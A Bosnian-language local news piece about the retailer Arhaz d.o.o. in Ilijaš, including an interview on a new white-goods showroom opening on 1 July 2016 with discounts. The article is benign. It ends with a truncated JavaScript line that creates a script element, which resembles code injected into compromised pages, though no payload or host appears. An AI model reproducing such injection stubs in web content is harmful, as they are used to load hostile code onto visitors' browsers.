“Arhaz” d.o.o. Ilijaš: u petak otvorenje novog salona bijele tehnike

ArhazARHAZ D.O.O Ilijaš je preduzeće osnovano davne 1996 godine. Sjedište firme je na adresi ul:Moševička 115 Podlugovi- gdje posjeduje veliki trgovački centar sa širokim asortimanom roba iz oblasti : vodo i elektro materijala, materijala za centralno grijanje, građevinskog materijala,keramičkih pločica, termo fasada, boja i lakova, brava i okova, bijele tehnike i sitnih kućanskih aparata, kao svih vrsta peći. Arhaz  također ima i prodavnicu zdrave hrane u Ilijašu u kojoj možete naći zdrave organski proizvedene gotove proizvode; od kojih izdvajamo prirodne sokove bez šećera, vode i konzervansa, zatim suho voće, bestilje i pekmeze pravljene na tradicionalni način,  te sezonsko voće i povrće . Pored navedenih prostora, Arhaz  posjeduje i fabriku za preradu voća u Sovrlama u kojoj je razvijena uspješna vlastita proizvodnja zdrave hrane pod brendom “UŽITAK.” Prateći potrebe kupaca, “Arhaz” uvodi novitet u Ilijaš o čemu je govorila šefica računovodstva ove fime, Mersiha Smajlović.

13535814_10208173095783228_739720834_n“Preduzeće Arhaz postoji već 20 godina a uskoro slavi i svoju jubilarnu dvadesetu godišnjicu postojanja i opstanka na tržištu. Trudili smo se da kvalitetom svojih  proizvoda, održavanjem povoljnih cijena, širokim asortimanom roba, sačuvamo  postojeće i pridobijemo povjerenje novih klijenata. Cilj našeg preduzeća je kvalitetan proizvod i zadovoljan kupac, te shodno tome preduzeće se trudi ukazano povjerenje svojih kupaca opravdati pružanjem raznih pogodnosti, akcija, popusta . Ono što je trenutno aktuelno u Arhazu jeste, akcija termofasada i fasadnih sistema na koje kupovinom ostvarujete popuste od 10-15%. a uskoro i velika bajramska sniženja  i popusti i do 20%”. “Arhaz” d.o.o. Ilijaš otvara novi izložbeno-prodajni salon bijele tehnike i kućanskih aparata u ulici 126. Ilijaške brigade u sklopu objekta Eko Arhaz. Drago nam je da kupcima možemo ponuditi nešto novo. U našem širokom asortimanu moći ćete naći sve vrste peći, frižidera, zamrzivača, mašine za veš i mašine za suđe, nape te ugradbene aparate. Otvaranje salona je 01. jula 2016. godine (petak). Kupce očekuju popusti od 10, 15 do nevjerovatnih 20% na bijelu tehniku, a prvih 20 kupaca očekuje poklon iznenađenje” kazala je Mersiha.

 Za posjetioce modernog izložbeno-prodajnog salona bijele tehnike i kućanskih aparata , na dan otvorenja 01.07.2016.godine (petak) obezbijeđena je zakuska i osvježenje . Jer pravi je prijatelj Vaš – d.o.o. “Arhaz” Ilijaš.

var d=document;var s=d.createElement(‘script’);